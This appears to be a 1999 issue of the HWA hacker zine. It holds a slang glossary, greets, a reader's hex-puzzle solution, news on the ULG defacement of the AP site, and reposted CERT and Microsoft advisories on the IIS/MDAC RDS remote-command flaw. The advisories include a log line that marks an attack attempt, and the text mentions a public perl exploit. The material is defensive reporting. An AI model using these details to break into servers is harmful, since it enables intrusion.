FAQ, included to assist first time readers: Some of the stuff related to personal useage and use in this zine are listed below: Some are very useful, others attempt to deny the any possible attempts at eschewing obfuscation by obsucuring their actual definitions. @HWA - see EoA ;-) != - Mathematical notation "is not equal to" or "does not equal" ASC(247) "wavey equals" sign means "almost equal" to. If written an =/= (equals sign with a slash thru it) also means !=, =< is Equal to or less than and => is equal to or greater than (etc, this aint fucking grade school, cripes, don't believe I just typed all that..) AAM - Ask a minor (someone under age of adulthood, usually <16, <18 or <21) AOL - A great deal of people that got ripped off for net access by a huge clueless isp with sekurity that you can drive buses through, we're not talking Kung-Fu being none too good here, Buy-A-Kloo maybe at the least they could try leasing one?? *CC - 1 - Credit Card (as in phraud) 2 - .cc is COCOS (Keeling) ISLANDS butthey probably accept cc's CCC - Chaos Computer Club (Germany) *CON - Conference, a place hackers crackers and hax0rs among others go to swap ideas, get drunk, swap new mad inphoz, get drunk, swap gear, get drunk watch videos and seminars, get drunk, listen to speakers, and last but not least, get drunk. *CRACKER - 1 . Someone who cracks games, encryption or codes, in popular hacker speak he's the guy that breaks into systems and is often (but by no means always) a "script kiddie" see pheer 2 . An edible biscuit usually crappy tasting without a nice dip, I like jalapeno pepper dip or chives sour cream and onion, yum - Ed Ebonics - speaking like a rastafarian or hip dude of colour also wigger Vanilla Ice is a wigger, The Beastie Boys and rappers speak using ebonics, speaking in a dark tongue ... being ereet, see pheer EoC - End of Commentary EoA - End of Article or more commonly @HWA EoF - End of file EoD - End of diatribe (AOL'ers: look it up) FUD - Coined by Unknown and made famous by HNN - "Fear uncertainty and doubt", usually in general media articles not high brow articles such as ours or other HNN affiliates ;) du0d - a small furry animal that scurries over keyboards causing people to type weird crap on irc, hence when someone says something stupid or off topic 'du0d wtf are you talkin about' may be used. *HACKER - Read Stephen Levy's HACKERS for the true definition, then see HAX0R *HAX0R - 1 - Cracker, hacker wannabe, in some cases a true hacker, this is difficult to define, I think it is best defined as pop culture's view on The Hacker ala movies such as well erhm "Hackers" and The Net etc... usually used by "real" hackers or crackers in a derogatory or slang humorous way, like 'hax0r me some coffee?' or can you hax0r some bread on the way to the table please?' 2 - A tool for cutting sheet metal. HHN - Maybe a bit confusing with HNN but we did spring to life around the same time too, HWA Hax0r News.... HHN is a part of HNN .. and HNN as a proper noun means the hackernews site proper. k? k. ;& HNN - Hacker News Network and its affiliates http://www.hackernews.com/affiliates.html J00 - "you"(as in j00 are OWN3D du0d) - see 0wn3d MFI/MOI- Missing on/from IRC NFC - Depends on context: No Further Comment or No Fucking Comment NFR - Network Flight Recorder (Do a websearch) see 0wn3d NFW - No fuckin'way *0WN3D - You are cracked and owned by an elite entity see pheer *OFCS - Oh for christ's sakes PHACV - And variations of same Phreaking, Hacking, Anarchy, Cracking, Carding (CC) Groups Virus, Warfare Alternates: H - hacking, hacktivist C - Cracking C - Cracking V - Virus W - Warfare A - Anarchy (explosives etc, Jolly Roger's Cookbook etc) P - Phreaking, "telephone hacking" PHone fREAKs ... CT - Cyber Terrorism *PHEER - This is what you do when an ereet or elite person is in your presence see 0wn3d *RTFM - Read the fucking manual - not always applicable since some manuals are pure shit but if the answer you seek is indeed in the manual then you should have RTFM you dumb ass. TBC - To Be Continued also 2bc (usually followed by ellipses...) :^0 TBA - To Be Arranged/To Be Announced also 2ba TFS - Tough fucking shit. *w00t - 1 - Reserved for the uber ereet, noone can say this without severe repercussions from the underground masses. also "w00ten" 2 - Cruciphux and sAs72's second favourite word (they're both shit stirrers) *wtf - what the fuck, where the fuck, when the fuck etc .. *ZEN - The state you reach when you *think* you know everything (but really don't) usually shortly after reaching the ZEN like state something will break that you just 'fixed' or tweaked. @HWA -=- :. .: -=- 01.0 Greets!?!?! yeah greets! w0w huh. - Ed ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Thanks to all in the community for their support and interest but i'd like to see more reader input, help me out here, whats good, what sucks etc, not that I guarantee i'll take any notice mind you, but send in your thoughts anyway. * all the people who sent in cool emails and support FProphet Pyra TwstdPair _NeM_ D----Y Dicentra vexxation sAs72 Spikeman p0lix Vortexia Wyze1 Pneuma Raven Zym0t1c duro Repluzer astral BHZ ScrewUp Qubik gov-boi Folks from #hwa.hax0r,news and #fawkerz, #ninjachat and #Hackwhores and #403-sec Celeb greets to Bad Kitty! meeyeaaooow! (you can hack my root anytime) Ken Williams/tattooman ex-of PacketStorm, & Kevin Mitnick kewl sites: + http://www.hack.co.za NEW + http://blacksun.box.sk. NEW + http://packetstorm.securify.com/ NEW + http://www.securityportal.com/ NEW + http://www.securityfocus.com/ NEW + http://www.hackcanada.com/ + http://www.l0pht.com/ + http://www.2600.com/ + http://www.freekevin.com/ + http://www.genocide2600.com/ + http://www.hackernews.com/ (Went online same time we started issue 1!) + http://www.net-security.org/ + http://www.slashdot.org/ + http://www.freshmeat.net/ + http://www.403-security.org/ + http://ech0.cjb.net/ @HWA 01.1 Last minute stuff, rumours and newsbytes ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ "What is popular isn't always right, and what is right isn't always popular..." - FProphet '99 +++ When was the last time you backed up your important data? ++ contributed by AW, From HNN http://www.hackernews.com/ HNN has received an unconfirmed rumor that the host of Parse Hack/Phreak, Shamrock was fired for unknown reasons. Shamrock along with UglyPig will evidently no longer be hosting any Pseudo.com shows. This action comes not two weeks after the MTV special in which Shamrock manufactured a hoax for the 'documentary'. There was no episode of Parse last week and HNN has yet to receive official word from Psuedo.com. It will be interesting to see if this weeks scheduled episode will air. (That show needed a change of format anyway.) http://Parsetv.com http://www.biztechtv.com/parse ++ Contributed by duro To celebrate the upcoming mass-destruction and world-wide chaos in 2000, w00w00 Security Development (WSD) will be releasing many advisories depending on vendor's timely responses. The severity of each vulnerability will outweigh the previously posted one, so keep your eyes out! If all goes according to plan, w00giving '99 will close with its largest vulnerability on Jan. 1, 2000, aka w00mageddon. ++ Contributed by Astral Nov 7th, 1999 #403-sec opens up on EFnet, the channel for http://www.403-security.org related stuff and news... drop by and say hi. ++ Echelon 'Confirmation:' Not (Politics 11:45 a.m.) http://www.wired.com/news/politics/0,1283,32302,00.html?tw=wn19991103 An Australian official's remarks to the BBC may bolster calls for investigation into international surveillance activities. But they don't confirm the alleged Project Echelon, experts say. By Chris Oakes. ++ Bull Carries Apple to Record (Reuters 12:20 p.m.) http://www.wired.com/news/reuters/0,1349,32306,00.html?tw=wn19991103 They're singing "Kumbaya" down in Cupertino on Wednesday because shares of the computer maker surge to an all-time high. ++ Rats Dive into Cell Phone Debate (Technology 3:00 a.m.) http://www.wired.com/news/technology/0,1282,32280,00.html?tw=wn19991103 An experiment with rats swimming in milk indicates cell phones may damage long-term memory and the ability to navigate. What does this strange study mean for humans? By Kristen Philipkoski. ++ Why the DVD Hack Was a Cinch (Technology 2.Nov.99) http://www.wired.com/news/technology/0,1282,32263,00.html?tw=wn19991103 DVD movies were supposed to be pirate-proof -- that was its reason for being. So how could two hackers break the code in a matter of hours? Human error on the encryption end. By Andy Patrizio. ++ The DVD Hack: What Next? (Technology 3:00 a.m.) http://www.wired.com/news/technology/0,1282,32265,00.html?tw=wn19991104 The supposed hacker-proof DVD security system was easily broken by Linux users who couldn't watch movies on their systems. Andy Patrizio, who broke the story, offers suggestions about what the movie industry should do next. ++ Haiti Shuts Down Its Biggest ISP (Politics 3:00 a.m.) http://www.wired.com/news/politics/0,1283,32316,00.html?tw=wn19991104 Thousands of Haitians lose Internet access when the government pulls the plug on the country's largest ISPs. Civil libertarians say the move supresses free speech and rally protesters. ++ China's Cable TV Fights for Net (Reuters 3:00 a.m.) http://www.wired.com/news/reuters/0,1349,32315,00.html?tw=wn19991104 China's government maneuvers to stem an increasingly bitter battle between cable operators and telephone companies over their future on the Net. Thanks to myself for providing the info from my wired news feed and others from whatever sources, also to Spikeman for sending in past entries.... - Ed @HWA 01.2 MAILBAG - email and posts from the message board worthy of a read ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Yeah we have a message board, feel free to use it, remember there are no stupid questions... well there are but if you ask something really dumb we'll just laugh at ya, lets give the message board a bit more use eh? i'll be using a real message board when the hwa-iwa.org domain comes back online (soon) meanwhile the beseen board is still up... ============================================================================== From: red_army To: Sent: Tuesday, November 02, 1999 9:00 PM hey, how's it going. i think i decoded your codes. any prizes for doing that? ;) a mention would be fine... keep up the good work (and make the codes a little harder!) (code from hwa.haxor.news issue 40) 1st code: [63 29 20 31 39 39 39 20 63 72 75 63 69 70 68 75 78 20 68 77 61 ] to hex: 99 41 32 49 57 57 57 32 99 114 117 99 112 104 117 120 32 104 119 97 to ascii: c) 1999 crucphux hwa which seems kinda incomplete, but that's how it decodes.... 2nd k0de: 61:20:6B:69:64:20:63:6F:75: 6C:64:20:62:72:65:61:6B:20:74:68:69:73: ] 20:22:65:6E:63:72:79:70:74:69:6F:6E:22:! decimal: 97:32:107:105:100:32:99:111:117: 108:100:32:98:114:101:97:107:32:116:104:105:115: 32:34:105:110:99:114:121:112:116:105:111:110:34:! ascii: a kid could break this "incryption" ! no sweat. 3rd code: [ 28 63 29 20 31 39 39 39 20 63 72 75 63 69 70 68 75 78 20 68 77 61 ] [45:6E:64]- [28:63:29:31:39:39:38:20:68:77:61:20:73:74:65:76:65] decimal: (first line appears to be decimal already) 69:110:100 - 40:97:49:57:57:56:32:104:119:97:32:115:116:101:118:101 plain ascii: first line has a lot of unprintables that i dunno right now... perhaps it is in sneaky hex?[1] and what is the minus sign for? intriguing... Enn-(a1998 hwa steve first line in hex: 40 97 41 32 49 57 57 57 32 97 114 117 97 105 112 104 117 120 32 104 119 97 first line in ascii: (a) 1999 aruaiphux hwa total ascii: (a) 1999 aruaiphux hwa Enn - (a1998 hwa steve well, it seems clear that sometimes a = c, but sometimes not changing selected a's yields: (c) 1999 cruciphux hwa Enn - (a1998 hwa steve i feel the top line is correct: all these exist as plaintext strings within the newsletter (hell, cruciphux writes the damn thing, doesn't he/she/non-gender-specific-pronoun?) but the bottom.... try subtracting second from first.. 69:110:100 - 40:97 :49 :57:57:56:32:104:119:97:32:115:116:101:118:101 ------------------ 29:3 :51, the first two are unprintable (meaning i don't know them) try adding the two modulus 128 (ascii, right? sure...) 69:110:100 + 40:97 :49 ------------------- (mod 128) 109:79:21 => mO try subtracting first from end of second: but that won't work, that will give us unprintables ok, so we got three characters. changing three characters at the beginning is not immediately obvious what that would give us. changing three characters at the end is somewhat more likely because a) st!!! could be a valid word, and b) steve doesn't make much sense, unless steve is cruciphux, which i don't know. ok, let's think this through... [ 28 63 29 20 31 39 39 39 20 63 72 75 63 69 70 68 75 78 20 68 77 61 ] [45:6E:64]-[28:63:29:31:39:39:38:20:68:77:61:20:73:74:65:76:65] is it coincidence that the three 'mystery' letters line up with three other letters? what can we do with those? remember, those seem to be part of a valid string, but the other three could be changed to give something else. (whatever that thought meant...) 63:29:20 45:6E:64 in decimal 108:102:84 (if E = 3, 3 = E in h@X0r5p3@k, right?) => lfU, which is at least a printable string, but not immediately obvious (unless cruciphux attends lower florida university or something like that, fuck school pride) converted from hex to decimal: 97:41 :32 69:110:100 added: 166:151:132 now, the highest letter ascii code is 122 (126 really, forget the tilde for now) and the lowest is 65 (33 for punctuation), so we have a spread of 122-65 = 57 characters. given that our added string has a spread of 166-132 = 34 characters, we have 23 different permutations of possible characters (again, just using letters...) hmmmm..... ok, this is a little wild, but here goes: taking 100 away from each of those leaves 'B3 ' using that, the bottom line reads as: B3 -(a1998 hwa steve let's look at what we have to work with: from the 1st part: c) 1999 crucphux hwa from the second part: (a) 1999 aruaiphux hwa Enn-(a1998 hwa steve or, verbatim: [63 29 20 31 39 39 39 20 63 72 75 63 69 70 68 75 78 20 68 77 61 ] [ 28 63 29 20 31 39 39 39 20 63 72 75 63 69 70 68 75 78 20 68 77 61 ] [45:6E:64]-[28:63:29:31:39:39:38:20:68:77:61:20:73:74:65:76:65] they do form lines, but i don't really feel like doing any matrix theory now (especially in ascii). c) 1999 crucphux hwa (a) 1999 aruaiphux hwa Enn-(a1998 hwa steve more speculation: if the e were lower case, it would have the same spread as 1 and 9; we would have to subtract (166-49=) 117 from at least that first term. doing that to all three yields 1" - that's not going to work. ok, i am thinking too hard. maybe ok, i got it. yes, i was thinking too hard, made a simple mistake at the stop. the last string should read (ok, i made a couple of mistakes): End-(c)1998 hwa steve which makes a lot more sense. and so the moral of the story is: check your fuckin work so you don't waste time later on! nice puzzle though, keep it up! (ps - i dunno if you were being facetious, but it's 'encryption', not 'incryption'. you know that already, i bet) [1] sneaky hex in that it not obviously hex, i.e. no letters... forget it keep up the good work 02.0 From the editor. ~~~~~~~~~~~~~~~~ #include #include #include main() { printf ("Read commented source!\n\n"); /* * I included some graphics in last week's issue and forgot to give * credit where it was due, the png was done by ScrewUp from the U.K * and the digital blasphemy rip was done by yours truly, with art * blatantly borrowed from http://www.digital-blasphemy.com/ * * Enjoy the issue, sorry again for it being late, have been ill, #42 * will be out ASAP covering Nov 7th - 14th. Included in the .zip of * this issue is a .bmp by Zym0t1c check it out, nice artwork... * Cruciphux@dok.org */ printf ("EoF.\n"); } Congrats, thanks, articles, news submissions and kudos to us at the main address: hwa@press.usmc.net complaints and all nastygrams and mai*lbombs can go to /dev/nul nukes, synfloods and papasmurfs to 127.0.0.1, private mail to cruciphux@dok.org danke. C*:. 03.0 Fix Available For Very Powerful IIS Exploit ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by Ender Wiggin The recent spate of defacements of government and military sites may be the result of a hole released to BugTraq six months ago. This hole can be exploited with a simple perl script. A fix for this problem has come from a very unlikely source, the United Loan Gunmen. OSALL http://www.aviary-mag.com/News/Powerful_Exploit/ULG_Fix/ulg_fix.html Late Update: 0931 CERT has also released an advisory on the issue and Microsoft does have an old fix. Considering the number of high profile sites that have been defaced because of this we suggest you patch your system now. CERT http://www.cert.org/current/current_activity.html#0 Microsoft Security Bulletin http://www.microsoft.com/security/bulletins/ms99-025.asp OSALL; Temporary Fix for Remote IIS NT AUTHORITY / SYSTEM Shell Spawning Exploits 11/1/99 United Loan Gunmen Recently, a perl script from Rain Forest Puppy was released, has become a favorite amongst script kiddies. The severity of this script allows remote NT AUTHORITY/SYSTEM level access, and is a major threat, even to highly secured NT networks. We have come up with 2 ways of thwarting these types of attacks. Since RFP's perl script relies on the use of either cmd.exe or command.com, we feel that a temporary fix of renaming cmd.exe shell or command.com shell to something else. Doing this will mostl likely fool 99% of the script kiddies. A better temporary idea would be to set permissions of cmd.exe and command.com for NT AUTHORITY/SYSTEM to that of 'No Access' versus 'Full Control'. The most noted problem with this is that of using the Schedule service, which, by default, runs as NT AUTHORITY/SYSTEM. In this case, in order to still use the service, Simply open up Services in the Control Panel. Select Schedule, then click the 'Startup...' button. By default, services are run as the System Account. Select the 'This Account:' radio button, and select a different user to run at services as. If you dont already have a user, create a new account. NOTE: With NT, we found it is a wise idea to set user access for shells (with NT, cmd and command) be different for services. This means that if netinfo.exe is run as NT AUTHORITY/SYSTEM, don't let NT AUTHORITY/SYSTEM have shell access. Should the ability to spawn a shell be possible, having permissions set as the above will stop it from happening, even if the hole is still there. We have only provided a temporary fix, as we have not had much time to spend dealing with RFP's perl script. Look to Microsoft or a third party to provide a real fix. -United Loan Gunmen. CERT; Attacks against IIS web servers involving MDAC We are receiving reports of IIS web servers being compromised via vulnerabilities in IIS web servers with MS Data Access Components (MDAC) installed. This vulnerability has been widely discussed as early as April 22, 1998. Here are some pointers to information about this vulnerability: http://support.microsoft.com/support/kb/articles/q184/3/75.asp http://www.microsoft.com/security/bulletins/ms98-004.asp http://www.microsoft.com/security/bulletins/ms99-025.asp In incidents reported to us so far, attacks can be identified by looking through the IIS logfiles for POST access to the file "/msadc/msadcs.dll". For example: 1999-10-24 20:38:12 - WWW POST /msadc/msadcs.dll 200 1409 664 782 ACTIVEDATA - - If you use Microsoft Remote Data Services (RDS) these POST operations may be legitimate. We encourage all sites using IIS to carefully follow the steps listed in Microsoft Advisory MS99-025, referenced above, to secure or disable RDS. Root Compromised UNIX Systems rpc.cmsd, tooltalk, statd/automountd We continue to receive frequent reports of intruders exploiting three different RPC service vulnerabilities to compromise UNIX systems. In many cases, the attacks are widespread and appear to be at least partially automated. For more information about this activity and the vulnerabilities being exploited, please refer to the following CERT/CC documents: IN-99-04, Similar attacks using various RPC services CA-99-08, Buffer overflow in rpc.cmsd CA-99-05, Vulnerability in statd exposes vulnerability in automountd CA-98.11, Vulnerability in ToolTalk RPC service am-utils (amd) We also continue to receive reports of intruder activity involving the am-utils package. For more information about this activity and the vulnerabilities being exploited, please refer to the following CERT/CC documents: IN-99-05, Systems Compromised Through a Vulnerability in am-utils CA-99-12, Buffer overflow in amd Distributed Intruder Tools Distributed Denial of Service Tools We are receiving an increasing number of reports about intruders compromising machines in order to install distributed systems used for launching packet flooding denial of service attacks. The systems contain a small number of servers and a large number of clients. These reports indicate that machines participating in such distributed systems are likely to have been root compromised. Widespread Scans and Probes We continue to receive daily reports of widespread scans and probes. Probe targets continue to include well-known services and a variety of registered and unregistered service ports. In some cases, scanning is automated and includes automated exploitation of vulnerabilities. The most frequent reports involve probes for services that have well-known vulnerabilities. Hosts continue to be compromised as a result of the vulnerabilities associated with these services. On some operating systems, these services are installed and enabled by default. Service Name Port/Protocol Related Information domain 53/tcp CA-98.05, Multiple Vulnerabilities in BIND ftp 21/tcp CA-99-13, Multiple Vulnerabilities in WU-FTPD icmp echo 8/icmp CA-98.01, Smurf IP Denial-of-Service Attacks sunrpc 111/tcp CA-99-12, Buffer overflow in amd CA-99-08, Buffer overflow in rpc.cmsd CA-99-05, Vulnerability in statd exposes vulnerability in automountd CA-98.11, Vulnerability in ToolTalk RPC service CA-98.12, Remotely Exploitable Buffer Overflow Vulnerability in mountd imap 143/tcp CA-98.09, Buffer Overflow in Some Implementations of IMAP Servers For an overview of incident and vulnerability activity during the last quarter, see the most recent CERT Summary. Copyright 1999 Carnegie Mellon University. See the conditions for use, disclaimers, and copyright information. CERT® and CERT Coordination Center® are registered in the U.S. Patent and Trademark office. Microsoft; Originally Released as MS98-004: July 17, 1998 Re-Released as MS99-025: July 19, 1999 Revised: July 23, 1999 Microsoft has identified a vulnerability in Microsoft Data Access Components (MDAC) that could allow a web site visitor to take unauthorized actions on a web site hosted using Internet Information Server. The vulnerability can be eliminated by reconfiguring or removing the affected components of MDAC. This vulnerability originally was reported in ms98-004.asp Microsoft Security Bulletin MS98-004 issued July 17, 1998. It was re-released on July 19, 1999, to remind customers of the need to address the vulnerability. It was updated on July 23, 1999, to discuss the need to remove sample files that are affected by the vulnerability, and to clarify that MDAC 2.0 is affected even if deployed as a clean installation. Frequently asked questions regarding this vulnerability can be found at ms99-025faq.asp http://www.microsoft.com/security/bulletins/MS99-025faq.asp. The FAQ contains instructions for eliminating the vulnerability. The RDS DataFactory object, a component of Microsoft Data Access Components (MDAC), exposes unsafe methods. When installed on a system running Internet Information Server 3.0 or 4.0, the DataFactory object may permit an otherwise unauthorized web user to perform privileged actions, including: - Allowing unauthorized users to execute shell commands on the IIS system as a privileged user. - On a multi-homed Internet-connected IIS system, using MDAC to tunnel SQL and other ODBC data requests through the public connection to a private back-end network. - Allowing unauthorized accessing to secured, non-published files on the IIS system. Affected Software Versions The vulnerability affects the Microsoft Data Access Components, when installed on a web server running Internet Information Server 3.0 or 4.0. Specifically: - MDAC 1.5 and 2.0 are affected - MDAC 2.1 is affected if installed as an upgrade from a previous version of MDAC, rather than a clean installation - Any version of MDAC is affected if Sample Pages for RDS are installed. NOTE: Sample Pages for RDS are provided as part of the Windows 4.0 Option Pack and the MDAC 2.0 Software Development Kit. They are not installed by default in the Option Pack, but are installed by default in the MDAC 2.0 SDK. NOTE: MDAC 1.5 and IIS are installed by default installations of the Windows NT 4.0 Option Pack. NOTE: IIS can be installed as part of other Microsoft products, such as Microsoft BackOffice and Microsoft Site Server. MDAC can be installed as part of other Microsoft products, such as Visual C and Microsoft Office. Patch Availability This vulnerability requires a configuration change to eliminate it, rather than a patch. Details of the specific changes needed are available at /security/bulletins/ms99-025faq.asp http://www.microsoft.com/security/bulletins/MS99-025faq.asp

More Information Please see the following references for more information related to this issue. - Microsoft Security Bulletin MS99-025: Frequently Asked Questions, MS99-025faq.asp http://www.microsoft.com/security/bulletins/MS99-025faq.asp - Microsoft Knowledge Base (KB) article Q184375, Security Implications of RDS 1.5, IIS, and ODBC http://support.microsoft.com/support/kb/articles/q184/3/75.asp http://support.microsoft.com/support/kb/articles/q184/3/75.asp - Microsoft Universal Data Access Download Page, http://www.microsoft.com/data/download.htm http://www.microsoft.com/data/download.htm - Installing MDAC Q&A, http://www.microsoft.com/data/MDAC21info/MDACinstQ.htm http://www.microsoft.com/data/MDAC21info/MDACinstQ.htm - Microsoft Security Advisor web site, http://www.microsoft.com/security/default.asp http://www.microsoft.com/security/default.asp - IIS Security Checklist, http://www.microsoft.com/security/products/iis/CheckList.asp http://www.microsoft.com/security/products/iis/CheckList.asp Obtaining Support on this Issue Microsoft Data Access Components (MDAC) is a fully supported set of technologies. If you require technical assistance with this issue, please contact Microsoft Technical Support. For information on contacting Microsoft Technical Support, please see http://support.microsoft.com/support/contact/default.asp http://support.microsoft.com/support/contact/default.asp. Acknowledgments Microsoft acknowledges Greg Gonzalez of http://www.infotechent.net ITE for bringing additional information regarding this vulnerability to our attention, and .Rain.Forest.Puppy for identifying the involvement of Sample Pages for RDS. Microsoft also acknowledges Russ Cooper (http://www.ntbugtraq.com NTBugTraq) for his assistance around this issue. Revisions July 19, 1999: Bulletin Created as re-release of MS98-004. July 23, 1999: Bulletin updated to discuss involvement of Sample Pages for RDS, and to clarify status of MDAC 2.0. THE INFORMATION PROVIDED IN THE MICROSOFT KNOWLEDGE BASE IS PROVIDED AS IS WITHOUT WARRANTY OF ANY KIND. MICROSOFT DISCLAIMS ALL WARRANTIES, EITHER EXPRESS OR IMPLIED, INCLUDING THE WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. IN NO EVENT SHALL MICROSOFT CORPORATION OR ITS SUPPLIERS BE LIABLE FOR ANY DAMAGES WHATSOEVER INCLUDING DIRECT, INDIRECT, INCIDENTAL, CONSEQUENTIAL, LOSS OF BUSINESS PROFITS OR SPECIAL DAMAGES, EVEN IF MICROSOFT CORPORATION OR ITS SUPPLIERS HAVE BEEN ADVISED OF THE POSSIBILITY OF SUCH DAMAGES. SOME STATES DO NOT ALLOW THE EXCLUSION OR LIMITATION OF LIABILITY FOR CONSEQUENTIAL OR INCIDENTAL DAMAGES SO THE FOREGOING LIMITATION MAY NOT APPLY. @HWA 04.0 ULG Defaces Associated Press Web Site ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by punkis While the United Loan Gunmen may be supplying fixes for some security problems (see above story) they are still busy defacing more sites. This time it was the Associated Press who was left with a page wishing folks a Happy Halloween and a poem by Edgar Allen Poe. HNN Cracked Pages Archive http://www.hackernews.com/archive/crackarch.html Nando Times http://www.nandotimes.com/technology/story/body/0,1634,500051909-500085255-500280864-0,00.html Wired http://www.wired.com/news/culture/0,1284,32237,00.html Nando; Hackers break into Associated Press Web site Copyright © 1999 Nando Media Copyright © 1999 Associated Press NEW YORK (November 1, 1999 9:27 p.m. EST http://www.nandotimes.com) - Hackers gained access to the The Associated Press' corporate Web site and displayed a Halloween greeting with a poem by Edgar Allan Poe. The page placed on the AP site Sunday carried the name of the "United Loan Gunmen." That name has appeared on break-ins at six other sites since August, including those of the Drudge Report, C-Span and ABC. The group also claimed responsibility for hacking a site for Nasdaq and the American Stock Exchange. AP news operations were unaffected. Wired; AP Scared Siteless Wired News Report 1:00 p.m. 31.Oct.1999 PST The "United Loan Gunmen" apparently struck again Sunday, this time by cracking the venerable Associated Press. Content on the wire service's corporate Web site was replaced with a Halloween greeting along with a poem by Edgar Allen Poe, according to the AP. The AP said its news wires were unaffected by the intrusion. The crackers have previously claimed credit for attacks on the Nasdaq and the American Stock Exchange, as well as the Drudge Report, C-Span, and ABC. Site defacement; Double, double, toil and trouble; Fire burn and caldron bubble. ~Edgar Allen Poe~ In the greenest of our valleys By good angels tenanted, Once a fair and stately palace- Radiant palace- reared its head. In the monarch Thought's dominion- It stood there! Never seraph spread a pinion Over fabric half so fair! Banners yellow, glorious, golden, On its roof did float and flow, (This- all this- was in the olden Time long ago,) And every gentle air that dallied, In that sweet day, Along the ramparts plumed and pallid, A winged odor went away. Wanderers in that happy valley, Through two luminous windows, saw Spirits moving musically, To a lute's well-tuned law, Round about a throne where, sitting (Porphyrogene!) In state his glory well-befitting, The ruler of the realm was seen. And all with pearl and ruby glowing Was the fair palace door, Through which came flowing, flowing, flowing, And sparkling evermore, A troop of Echoes, whose sweet duty Was but to sing, In voices of surpassing beauty, The wit and wisdom of their king. But evil things, in robes of sorrow, Assailed the monarch's high estate. (Ah, let us mourn!- for never morrow Shall dawn upon him desolate!) And round about his home the glory That blushed and bloomed, Is but a dim-remembered story Of the old time entombed. And travellers, now, within that valley, Through the red-litten windows see Vast forms, that move fantastically To a discordant melody, While, like a ghastly rapid river, Through the pale door A hideous throng rush out forever And laugh- but smile no more. @HWA 05.0 Jane's To Host Cyber Terrorism Conference ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by William Knowles Jane's Intelligence Review will be hosting a conference on Cyber Terrorism in Washington DC on November 16 and 17, 1999. The title of the conference is Cyberterrorism: The Risks and Realities. Cyberterrorism: The Risks and Realities http://www.janes.com/defence/conference/cyberterrorism/cyber_home.html Janes conferences Terrorist organizations, both domestic and international, are looking toward technology to further their goals of disrupting your life or even harming you and the people you are trying to protect. Terrorists for the first time have the ability to affect your life remotely. By using computers and the internet, they can strike from the other side of the world, with relative anonymity and free from danger. CyberTerrorism requires simple, inexpensive hardware, free software and information available over the Internet. Awareness to a new state of terrorism is crucial whether you are trying to protect your own computer, your company's systems or the infrastructure of your city or country. It is less the types of hacking incidents and mass distribution of viruses that receive media attention that is important. The real threat is an insidious form of hard-core hacking where the physical and virtual worlds collide. Whether you are in the military, government or private sector, your vulnerability to terrorist attack is only increasing as the world becomes more dependent on computer systems­especially in critical infrastructure and life affecting industries that are being linked with each other across the globe. Now you are not just in alliance with other people and nations, but also their communication equipment, computers and other technologies. Systems that control your finances, power, water, and communications as well as those in food and pharmaceutical plants, are vulnerable. Jane's CyberTerrorism: The Risks and Realities goes beyond the threats and issues and focuses on practical solutions to real threats to your security: - You will be guided through ways to develop and implement a counter-CyberTerrorism program. - You will leave the conference with a clear sense of direction and a list of feasible steps assess your risk and build a program of prevention, detection and response. - You will get plenty of time for questions as well as interaction with speaker and colleagues. - You can put the information you have learned to work during a mock CyberTerrorism attack wargame. @HWA 06.0 Trust Site Solution Released ~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by no0ne As the Federal Trade Commission continues with its efforts to decrease webjacking, Inspective Systems is set to come out with Trust Site Solution, which is being claimed as the first content-certification program. The software aims to protect the users and consumers against people who use simple HTML tricks to redirect traffic from legitimate web sites to fake ones. This can lead unsuspecting consumers into giving up their credit card numbers and other personal information. InfoWorld http://www.infoworld.com/cgi-bin/displayStory.pl?991029.hnwebjack.htm IT gets tools to thwart Webjackers By Ed Scannell InfoWorld Electric Posted at 4:43 PM PT, Oct 29, 1999 As millions of IT organizations hurry to get their businesses on-line to cash in on the electronic-commerce gold rush, it is getting more complicated to build trust among users by guaranteeing that Web site information is accurate and securely protected. The latest challenge to that guarantee is "Webjacking," the nasty business of hackers hijacking legitimate Web pages and redirecting users to anywhere from pornography sites to sites set up for fraudulent business schemes. Some industry observers believe that, if the practice continues to escalate unchecked, it could eventually erode users' buying confidence and negatively affect corporations' e-commerce revenues. But while the bad guys appear to have a technical head start, good guys responsible for coming up with preventative security cures are starting to appear. Inspective Systems, formerly known as Factpoint, a small software company in Burlington, Mass., will release by the end of the year its Trustsite Solution, which officials claim is the first content-certification program for Web sites. The solution basically sets up a separate certification server for each Web site and creates a digital fingerprint for each certified page and each piece of content. Another component of the package sets up a validation server that constantly monitors a site's certified content as each page is loaded. Some observers believe that Inspective's product could play a significant role in softening the anxieties of both corporate users and consumers. "What is interesting about what Factpoint [does, is that it provides] a way to ensure authentication. You can install software on your machine that verifies that what you have is what you think you have,'' said Carol Baroudi, senior strategist for electronic business at the Hurwitz Group, in Framingham, Mass. "Many people using the Web have no understanding that just because you see it, doesn't mean it is true. [Webjacking] is becoming more and more pervasive as people begin to understand how to manipulate the Web. These incidences will rise considerably on both corporate and consumer levels," Baroudi said. Still, the practice has become enough of a threat that Federal Trade Commission officials late last month announced that the commission would crack down on Webjackers, saying that it is now looking into its one hundredth related Internet case. Although most analysts believe that tens of millions of dollars have already been hijacked from legitimate sites, none of them are willing to offer estimated figures on the losses. The problem is that few companies are willing to admit they have been victimized in a fraudulent scheme, either out of embarrassment or in fear of drawing the attention of more hackers. "There is no way you announce to the world that someone has hacked your site. It's like sending out an invitation to 'Hacker Central' to take another whack at you," said one IT executive at a large East Coast publisher. Unfortunately, redirecting traffic from a legitimate Web site is easy to do. In many cases, it involves copying a Web site's opening page. Then, with just a few lines of code, hackers can get all of a site's HTML links to point to an illegitimate site. In other cases, it is a matter of adding just a few meta tags to a popular search engine used to find Web sites. "Essentially, [hackers] are inserting themselves in the middle. They will gladly pose as legitimate. Eventually, they are hoping you will add things to their site's shopping cart," commented Charles Palmer, manager of network security and cryptography at IBM's T.J. Watson Research Center, in Yorktown Heights, N.Y. One result of this could be that hackers can steal credit card 